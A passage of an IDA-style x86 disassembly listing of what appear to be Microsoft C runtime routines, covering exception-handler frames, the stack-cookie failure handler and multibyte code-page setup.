var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
cmp [ebp+arg_0], 123h
jnz short loc_404316
mov eax, offset loc_40439D
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
jmp loc_4043C6
; ---------------------------------------------------------------------------
loc_404316: ; CODE XREF: sub_4042F4+E�j
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_4043C9
mov eax, dword_423064
lea ecx, [ebp+var_28]
xor eax, ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_10]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_14]
mov [ebp+var_14], eax
mov eax, [ebp+arg_18]
mov [ebp+var_10], eax
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_38], 1
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov eax, [ebp+arg_8]
mov [ebp+var_30], eax
call sub_40539D
mov eax, [eax+80h]
mov [ebp+var_2C], eax
lea eax, [ebp+var_34]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call [ebp+var_2C]
pop ecx
pop ecx
and [ebp+var_38], 0
loc_40439D: ; DATA XREF: sub_4042F4+10�o
cmp [ebp+var_4], 0
jz short loc_4043BA
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_4043C3
; ---------------------------------------------------------------------------
loc_4043BA: ; CODE XREF: sub_4042F4+AD�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_4043C3: ; CODE XREF: sub_4042F4+C4�j
mov eax, [ebp+var_38]
loc_4043C6: ; CODE XREF: sub_4042F4+1D�j
pop ebx
leave
retn
sub_4042F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043C9 proc near ; DATA XREF: sub_4042F4+26�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
cld
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
xor ecx, [ebp+arg_4]
call sub_402710
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
jz short loc_4043F9
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_404463
; ---------------------------------------------------------------------------
jmp short loc_404463
; ---------------------------------------------------------------------------
loc_4043F9: ; CODE XREF: sub_4043C9+1D�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+18h]
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
push [ebp+arg_0]
call sub_40BD75
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_404437
push [ebp+arg_0]
push [ebp+arg_4]
call sub_40423C
loc_404437: ; CODE XREF: sub_4043C9+61�j
push 0
push 0
push 0
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 123h
call sub_4042F4
add esp, 1Ch
mov eax, [ebp+var_4]
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp eax
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_404463: ; CODE XREF: sub_4043C9+2C�j
; sub_4043C9+2E�j
pop ebx
leave
retn
sub_4043C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404466 proc near ; CODE XREF: sub_40B915+81�p
; sub_40BA07+1C6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, [edi+10h]
mov esi, [edi+0Ch]
mov [ebp+var_4], eax
mov ebx, esi
jmp short loc_4044AA
; ---------------------------------------------------------------------------
loc_40447D: ; CODE XREF: sub_404466+4B�j
cmp esi, 0FFFFFFFFh
jnz short loc_404487
call sub_40BEA5
loc_404487: ; CODE XREF: sub_404466+1A�j
mov ecx, [ebp+var_4]
dec esi
mov eax, esi
imul eax, 14h
add eax, ecx
mov ecx, [ebp+arg_8]
cmp [eax+4], ecx
jge short loc_40449F
cmp ecx, [eax+8]
jle short loc_4044A4
loc_40449F: ; CODE XREF: sub_404466+32�j
cmp esi, 0FFFFFFFFh
jnz short loc_4044AD
loc_4044A4: ; CODE XREF: sub_404466+37�j
dec [ebp+arg_4]
mov ebx, [ebp+arg_0]
loc_4044AA: ; CODE XREF: sub_404466+15�j
mov [ebp+arg_0], esi
loc_4044AD: ; CODE XREF: sub_404466+3C�j
cmp [ebp+arg_4], 0
jge short loc_40447D
mov eax, [ebp+arg_C]
inc esi
mov [eax], esi
mov eax, [ebp+arg_10]
mov [eax], ebx
cmp ebx, [edi+0Ch]
ja short loc_4044C7
cmp esi, ebx
jbe short loc_4044CC
loc_4044C7: ; CODE XREF: sub_404466+5B�j
call sub_40BEA5
loc_4044CC: ; CODE XREF: sub_404466+5F�j
mov eax, esi
imul eax, 14h
add eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_404466 endp
; =============== S U B R O U T I N E =======================================
sub_4044D9 proc near ; CODE XREF: sub_40B4FD+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_40539D
mov eax, [eax+98h]
mov [esi+4], eax
call sub_40539D
mov [eax+98h], esi
mov eax, esi
pop esi
retn
sub_4044D9 endp
; =============== S U B R O U T I N E =======================================
sub_404501 proc near ; CODE XREF: sub_40B623+60�p
arg_0 = dword ptr 4
call sub_40539D
mov eax, [eax+98h]
jmp short loc_404519
; ---------------------------------------------------------------------------
loc_40450E: ; CODE XREF: sub_404501+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_40451F
mov eax, [eax+4]
loc_404519: ; CODE XREF: sub_404501+B�j
test eax, eax
jnz short loc_40450E
inc eax
retn
; ---------------------------------------------------------------------------
loc_40451F: ; CODE XREF: sub_404501+13�j
xor eax, eax
retn
sub_404501 endp
; =============== S U B R O U T I N E =======================================
sub_404522 proc near ; CODE XREF: sub_40B623+9�p
arg_0 = dword ptr 4
push esi
call sub_40539D
mov esi, [esp+4+arg_0]
cmp esi, [eax+98h]
jnz short loc_404544
call sub_40539D
mov ecx, [esi+4]
mov [eax+98h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_404544: ; CODE XREF: sub_404522+10�j
call sub_40539D
mov eax, [eax+98h]
jmp short loc_40455A
; ---------------------------------------------------------------------------
loc_404551: ; CODE XREF: sub_404522+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_404566
mov eax, ecx
loc_40455A: ; CODE XREF: sub_404522+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_404551
pop esi
jmp sub_40BEA5
; ---------------------------------------------------------------------------
loc_404566: ; CODE XREF: sub_404522+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_404522 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40456E proc near ; CODE XREF: sub_40B4FD+7F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
and [ebp+var_18], 0
lea ecx, [ebp+var_18]
xor eax, ecx
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_14], offset loc_4042C4
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_18], eax
lea eax, [ebp+var_18]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_40BEF0
mov ecx, eax
mov eax, [ebp+var_18]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_40456E endp
; =============== S U B R O U T I N E =======================================
sub_4045CC proc near ; CODE XREF: sub_401065+7�p
; sub_40121E+7�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, dword_423064
xor eax, ebp
push eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4045CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4045FF proc near ; CODE XREF: sub_401442+7�p
; sub_40B4B4+7�p
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, dword_423064
xor eax, ebp
push eax
mov [ebp-10h], esp
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4045FF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404635 proc near ; CODE XREF: sub_40177B+A�p
; sub_4019F3+A�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, dword_423064
xor eax, ebp
push eax
mov [ebp-10h], eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_404635 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40466B proc near ; CODE XREF: sub_401065+2D�p
; sub_40121E+6B�p ...
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
retn
sub_40466B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40467F proc near ; CODE XREF: sub_40177B:loc_4019EB�p
; sub_4019F3:loc_401C15�p ...
mov ecx, [ebp-10h]
xor ecx, ebp
call sub_402710
jmp sub_40466B
sub_40467F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40468E proc near ; CODE XREF: sub_402710:loc_40271A�j
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 328h
mov dword_425BA8, eax
mov dword_425BA4, ecx
mov dword_425BA0, edx
mov dword_425B9C, ebx
mov dword_425B98, esi
mov dword_425B94, edi
mov word_425BC0, ss
mov word_425BB4, cs
mov word_425B90, ds
mov word_425B8C, es
mov word_425B88, fs
mov word_425B84, gs
pushf
pop dword_425BB8
mov eax, [ebp+0]
mov dword_425BAC, eax
mov eax, [ebp+4]
mov dword_425BB0, eax
lea eax, [ebp+arg_0]
mov dword_425BBC, eax
mov eax, [ebp+var_320]
mov dword_425AF8, 10001h
mov eax, dword_425BB0
mov dword_425AAC, eax
mov dword_425AA0, 0C0000409h
mov dword_425AA4, 1
mov eax, dword_423064
mov [ebp+var_328], eax
mov eax, dword_423068
mov [ebp+var_324], eax
call ds:dword_41D090 ; IsDebuggerPresent
mov dword_425AF0, eax
push 1
call sub_407B65
pop ecx
push 0
call ds:dword_41D19C ; SetUnhandledExceptionFilter
push offset off_41D3F8
call ds:dword_41D198 ; UnhandledExceptionFilter
cmp dword_425AF0, 0
jnz short loc_40477E
push 1
call sub_407B65
pop ecx
loc_40477E: ; CODE XREF: sub_40468E+E6�j
push 0C0000409h
call ds:dword_41D0CC ; GetCurrentProcess
push eax
call ds:dword_41D0F8 ; TerminateProcess
leave
retn
sub_40468E endp
; =============== S U B R O U T I N E =======================================
sub_404792 proc near ; CODE XREF: sub_404ABE+11E�p
; sub_404ABE+173�p
sub eax, 3A4h
jz short loc_4047BB
sub eax, 4
jz short loc_4047B5
sub eax, 0Dh
jz short loc_4047AF
dec eax
jz short loc_4047A9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4047A9: ; CODE XREF: sub_404792+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_404792+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_4047B5: ; CODE XREF: sub_404792+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_4047BB: ; CODE XREF: sub_404792+5�j
mov eax, 411h
retn
sub_404792 endp
; =============== S U B R O U T I N E =======================================
sub_4047C1 proc near ; CODE XREF: sub_404ABE+2B�p
push ebx
push ebp
push esi
push edi
mov ebp, 101h
mov esi, eax
push ebp
xor edi, edi
lea ebx, [esi+1Ch]
push edi
push ebx
call sub_407B70
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
xor eax, eax
lea edi, [esi+10h]
stosd
stosd
stosd
mov eax, offset dword_423070
add esp, 0Ch
sub eax, esi
loc_4047F4: ; CODE XREF: sub_4047C1+3A�j
mov cl, [eax+ebx]
mov [ebx], cl
inc ebx
dec ebp
jnz short loc_4047F4
lea ecx, [esi+11Dh]
mov esi, 100h
loc_404808: ; CODE XREF: sub_4047C1+4E�j
mov dl, [ecx+eax]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_404808
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4047C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=49Ch
sub_404816 proc near ; CODE XREF: sub_404ABE+141�p
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_512 = byte ptr -512h
var_511 = byte ptr -511h
var_504 = word ptr -504h
var_304 = byte ptr -304h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-49Ch]
sub esp, 51Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+49Ch+var_4], eax
push ebx
push edi
lea eax, [ebp+49Ch+var_518]
push eax
push dword ptr [esi+4]
call ds:dword_41D1B4 ; GetCPInfo
test eax, eax
mov edi, 100h
jz loc_40493C
xor eax, eax
loc_40484F: ; CODE XREF: sub_404816+43�j
mov [ebp+eax+49Ch+var_104], al
inc eax
cmp eax, edi
jb short loc_40484F
mov al, [ebp+49Ch+var_512]
test al, al
mov [ebp+49Ch+var_104], 20h
jz short loc_404894
lea ebx, [ebp+49Ch+var_511]
loc_40486C: ; CODE XREF: sub_404816+7C�j
movzx ecx, al
movzx eax, byte ptr [ebx]
cmp ecx, eax
ja short loc_40488C
sub eax, ecx
inc eax
push eax
lea edx, [ebp+ecx+49Ch+var_104]
push 20h
push edx
call sub_407B70
add esp, 0Ch
loc_40488C: ; CODE XREF: sub_404816+5E�j
inc ebx
mov al, [ebx]
inc ebx
test al, al
jnz short loc_40486C
loc_404894: ; CODE XREF: sub_404816+51�j
push 0
push dword ptr [esi+0Ch]
lea eax, [ebp+49Ch+var_504]
push dword ptr [esi+4]
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 1
push 0
call sub_40C4F4
xor ebx, ebx
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_204]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push edi
push dword ptr [esi+0Ch]
push ebx
call sub_40C2F9
add esp, 44h
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_304]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 200h
push dword ptr [esi+0Ch]
push ebx
call sub_40C2F9
add esp, 24h
xor eax, eax
loc_4048FB: ; CODE XREF: sub_404816+122�j
movzx ecx, [ebp+eax*2+49Ch+var_504]
test cl, 1
jz short loc_404913
or byte ptr [esi+eax+1Dh], 10h
mov cl, [ebp+eax+49Ch+var_204]
jmp short loc_404924
; ---------------------------------------------------------------------------
loc_404913: ; CODE XREF: sub_404816+ED�j
test cl, 2
jz short loc_40492D
or byte ptr [esi+eax+1Dh], 20h
mov cl, [ebp+eax+49Ch+var_304]
loc_404924: ; CODE XREF: sub_404816+FB�j
mov [esi+eax+11Dh], cl
jmp short loc_404935
; ---------------------------------------------------------------------------
loc_40492D: ; CODE XREF: sub_404816+100�j
mov byte ptr [esi+eax+11Dh], 0
loc_404935: ; CODE XREF: sub_404816+115�j
inc eax
cmp eax, edi
jb short loc_4048FB
jmp short loc_404989
; ---------------------------------------------------------------------------
loc_40493C: ; CODE XREF: sub_404816+31�j
lea eax, [esi+11Dh]
mov [ebp+49Ch+var_51C], 0FFFFFF9Fh
xor ecx, ecx
sub [ebp+49Ch+var_51C], eax
loc_40494E: ; CODE XREF: sub_404816+171�j
mov edx, [ebp+49Ch+var_51C]
lea eax, [esi+ecx+11Dh]
add edx, eax
lea ebx, [edx+20h]
cmp ebx, 19h
ja short loc_40496E
or byte ptr [esi+ecx+1Dh], 10h
mov dl, cl
add dl, 20h
jmp short loc_40497D
; ---------------------------------------------------------------------------
loc_40496E: ; CODE XREF: sub_404816+14A�j
cmp edx, 19h
ja short loc_404981
or byte ptr [esi+ecx+1Dh], 20h
mov dl, cl
sub dl, 20h
loc_40497D: ; CODE XREF: sub_404816+156�j
mov [eax], dl
jmp short loc_404984
; ---------------------------------------------------------------------------
loc_404981: ; CODE XREF: sub_404816+15B�j
mov byte ptr [eax], 0
loc_404984: ; CODE XREF: sub_404816+169�j
inc ecx
cmp ecx, edi
jb short loc_40494E
loc_404989: ; CODE XREF: sub_404816+124�j
mov ecx, [ebp+49Ch+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 49Ch
leave
retn
sub_404816 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049A0 proc near ; CODE XREF: sub_40271F+57�p
; sub_404C69+1A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421430
call __SEH_prolog4
call sub_40539D
mov edi, eax
mov eax, dword_423594
test [edi+70h], eax
jz short loc_4049DA
cmp dword ptr [edi+6Ch], 0
jz short loc_4049DA
mov esi, [edi+68h]
loc_4049C6: ; CODE XREF: sub_4049A0+96�j
test esi, esi
jnz short loc_4049D2
push 20h
call sub_40785D
pop ecx
loc_4049D2: ; CODE XREF: sub_4049A0+28�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4049DA: ; CODE XREF: sub_4049A0+1B�j
; sub_4049A0+21�j
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [edi+68h]
mov [ebp+var_1C], esi
cmp esi, dword_423498
jz short loc_404A2A
test esi, esi
jz short loc_404A12
push esi
call ds:dword_41D1BC ; InterlockedDecrement
test eax, eax
jnz short loc_404A12
cmp esi, offset dword_423070
jz short loc_404A12
push esi
call sub_403603
pop ecx
loc_404A12: ; CODE XREF: sub_4049A0+56�j
; sub_4049A0+61�j ...
mov eax, dword_423498
mov [edi+68h], eax
mov esi, dword_423498
mov [ebp+var_1C], esi
push esi
call ds:dword_41D1B8 ; InterlockedIncrement
loc_404A2A: ; CODE XREF: sub_4049A0+52�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404A3B
jmp short loc_4049C6
sub_4049A0 endp
; =============== S U B R O U T I N E =======================================
sub_404A38 proc near ; DATA XREF: .rdata:00421448�o
mov esi, [ebp-1Ch]
sub_404A38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404A3B proc near ; CODE XREF: sub_4049A0+91�p
push 0Dh
call sub_40591F
pop ecx
retn
sub_404A3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A44 proc near ; CODE XREF: sub_404ABE+19�p
; sub_404C69+25�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
lea ecx, [ebp+var_10]
call sub_40271F
cmp esi, 0FFFFFFFEh
mov dword_425DC4, ebx
jnz short loc_404A7F
mov dword_425DC4, 1
call ds:dword_41D188 ; GetOEMCP
loc_404A71: ; CODE XREF: sub_404A44+50�j
; sub_404A44+67�j
cmp [ebp+var_4], bl
jz short loc_404ABB
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_404ABB
; ---------------------------------------------------------------------------
loc_404A7F: ; CODE XREF: sub_404A44+1B�j
cmp esi, 0FFFFFFFDh
jnz short loc_404A96
mov dword_425DC4, 1
call ds:dword_41D18C ; GetACP
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404A96: ; CODE XREF: sub_404A44+3E�j
cmp esi, 0FFFFFFFCh
jnz short loc_404AAD
mov eax, [ebp+var_10]
mov eax, [eax+4]
mov dword_425DC4, 1
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AAD: ; CODE XREF: sub_404A44+55�j
cmp [ebp+var_4], bl
jz short loc_404AB9
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_404AB9: ; CODE XREF: sub_404A44+6C�j
mov eax, esi
loc_404ABB: ; CODE XREF: sub_404A44+30�j
; sub_404A44+39�j
pop ebx
leave
retn
sub_404A44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404ABE proc near ; CODE XREF: sub_404C69+5E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
call sub_404A44
mov edi, eax
xor esi, esi
cmp edi, esi
mov [ebp+arg_0], edi
jnz short loc_404AF5
loc_404AE7: ; CODE XREF: sub_404ABE+193�j
mov eax, ebx
call sub_4047C1
loc_404AEE: ; CODE XREF: sub_404ABE+146�j
xor eax, eax
jmp loc_404C5A
; ---------------------------------------------------------------------------
loc_404AF5: ; CODE XREF: sub_404ABE+27�j
mov [ebp+var_1C], esi
xor eax, eax
loc_404AFA: ; CODE XREF: sub_404ABE+4F�j
cmp dword_4234A0[eax], edi
jz short loc_404B69
inc [ebp+var_1C]
add eax, 30h
cmp eax, 0F0h
jb short loc_404AFA
lea eax, [ebp+var_18]
push eax
push edi
call ds:dword_41D1B4 ; GetCPInfo
test eax, eax
jz loc_404C4B
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407B70
xor edx, edx
inc edx
add esp, 0Ch
cmp [ebp+var_18], edx
mov [ebx+4], edi
mov [ebx+0Ch], esi
jbe loc_404C3E
cmp [ebp+var_12], 0
jz loc_404C1F
lea esi, [ebp+var_11]
loc_404B53: ; CODE XREF: sub_404ABE+15B�j
mov cl, [esi]
test cl, cl
jz loc_404C1F
movzx eax, byte ptr [esi-1]
movzx ecx, cl
jmp loc_404C0F
; ---------------------------------------------------------------------------
loc_404B69: ; CODE XREF: sub_404ABE+42�j
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407B70
mov ecx, [ebp+var_1C]
add esp, 0Ch
imul ecx, 30h
mov [ebp+var_20], esi
lea esi, dword_4234B0[ecx]
mov [ebp+var_1C], esi
jmp short loc_404BB9
; ---------------------------------------------------------------------------
loc_404B8F: ; CODE XREF: sub_404ABE+FE�j
mov al, [esi+1]
test al, al
jz short loc_404BBE
movzx edi, byte ptr [esi]
movzx eax, al
jmp short loc_404BB0
; ---------------------------------------------------------------------------
loc_404B9E: ; CODE XREF: sub_404ABE+F4�j
mov eax, [ebp+var_20]
mov al, byte_42349C[eax]
or [ebx+edi+1Dh], al
movzx eax, byte ptr [esi+1]
inc edi
loc_404BB0: ; CODE XREF: sub_404ABE+DE�j
cmp edi, eax
jbe short loc_404B9E
mov edi, [ebp+arg_0]
inc esi
inc esi
loc_404BB9: ; CODE XREF: sub_404ABE+CF�j
; sub_404ABE+110�j
cmp byte ptr [esi], 0
jnz short loc_404B8F
loc_404BBE: ; CODE XREF: sub_404ABE+D6�j
mov esi, [ebp+var_1C]
inc [ebp+var_20]
add esi, 8
cmp [ebp+var_20], 4
mov [ebp+var_1C], esi
jb short loc_404BB9
mov eax, edi
mov [ebx+4], edi
mov dword ptr [ebx+8], 1
call sub_404792
push 6
mov [ebx+0Ch], eax
lea eax, [ebx+10h]
lea ecx, dword_4234A4[ecx]
pop edx
loc_404BF0: ; CODE XREF: sub_404ABE+13D�j
mov si, [ecx]
inc ecx
mov [eax], si
inc ecx
inc eax
inc eax
dec edx
jnz short loc_404BF0
loc_404BFD: ; CODE XREF: sub_404ABE+18B�j
mov esi, ebx
call sub_404816
jmp loc_404AEE
; ---------------------------------------------------------------------------
loc_404C09: ; CODE XREF: sub_404ABE+153�j
or byte ptr [ebx+eax+1Dh], 4
inc eax
loc_404C0F: ; CODE XREF: sub_404ABE+A6�j
cmp eax, ecx
jbe short loc_404C09
inc esi
inc esi
cmp byte ptr [esi-1], 0
jnz loc_404B53
loc_404C1F: ; CODE XREF: sub_404ABE+8C�j
; sub_404ABE+99�j
lea eax, [ebx+1Eh]
mov ecx, 0FEh
loc_404C27: ; CODE XREF: sub_404ABE+16E�j
or byte ptr [eax], 8
inc eax
dec ecx
jnz short loc_404C27
mov eax, [ebx+4]
call sub_404792
mov [ebx+0Ch], eax
mov [ebx+8], edx
jmp short loc_404C41
; ---------------------------------------------------------------------------
loc_404C3E: ; CODE XREF: sub_404ABE+82�j
mov [ebx+8], esi
loc_404C41: ; CODE XREF: sub_404ABE+17E�j
xor eax, eax
lea edi, [ebx+10h]
stosd
stosd
stosd
jmp short loc_404BFD
; ---------------------------------------------------------------------------
loc_404C4B: ; CODE XREF: sub_404ABE+5E�j
cmp dword_425DC4, esi
jnz loc_404AE7
or eax, 0FFFFFFFFh
loc_404C5A: ; CODE XREF: sub_404ABE+32�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_404ABE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C69 proc near ; CODE XREF: sub_404E03+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00404DD5 SIZE 0000002E BYTES
push 14h
push offset dword_421450
call __SEH_prolog4
or [ebp+var_20], 0FFFFFFFFh
call sub_40539D
mov edi, eax
mov [ebp+var_24], edi
call sub_4049A0
mov ebx, [edi+68h]
mov esi, [ebp+arg_0]
call sub_404A44
mov [ebp+arg_0], eax
cmp eax, [ebx+4]
jz loc_404DF6
push 220h
call sub_40773A
pop ecx
mov ebx, eax
test ebx, ebx
jz loc_404DFA
mov ecx, 88h
mov esi, [edi+68h]
mov edi, ebx
rep movsd
and dword ptr [ebx], 0
push ebx
push [ebp+arg_0]
call sub_404ABE
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz loc_404DD5
mov esi, [ebp+var_24]
push dword ptr [esi+68h]
call ds:dword_41D1BC ; InterlockedDecrement
test eax, eax
jnz short loc_404CFA
mov eax, [esi+68h]
cmp eax, offset dword_423070
jz short loc_404CFA
push eax
call sub_403603
pop ecx
loc_404CFA: ; CODE XREF: sub_404C69+7E�j
; sub_404C69+88�j
mov [esi+68h], ebx
push ebx
mov edi, ds:dword_41D1B8
call edi ; InterlockedIncrement
test byte ptr [esi+70h], 2
jnz loc_404DFA
test byte ptr dword_423594, 1
jnz loc_404DFA
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebx+4]
mov dword_425DD4, eax
mov eax, [ebx+8]
mov dword_425DD8, eax
mov eax, [ebx+0Ch]
mov dword_425DDC, eax
xor eax, eax
loc_404D43: ; CODE XREF: sub_404C69+F0�j
mov [ebp+var_1C], eax
cmp eax, 5
jge short loc_404D5B
mov cx, [ebx+eax*2+10h]
mov word_425DC8[eax*2], cx
inc eax
jmp short loc_404D43
; ---------------------------------------------------------------------------
loc_404D5B: ; CODE XREF: sub_404C69+E0�j
xor eax, eax
loc_404D5D: ; CODE XREF: sub_404C69+109�j
mov [ebp+var_1C], eax
cmp eax, 101h
jge short loc_404D74
mov cl, [eax+ebx+1Ch]
mov byte_423290[eax], cl
inc eax
jmp short loc_404D5D
; ---------------------------------------------------------------------------
loc_404D74: ; CODE XREF: sub_404C69+FC�j
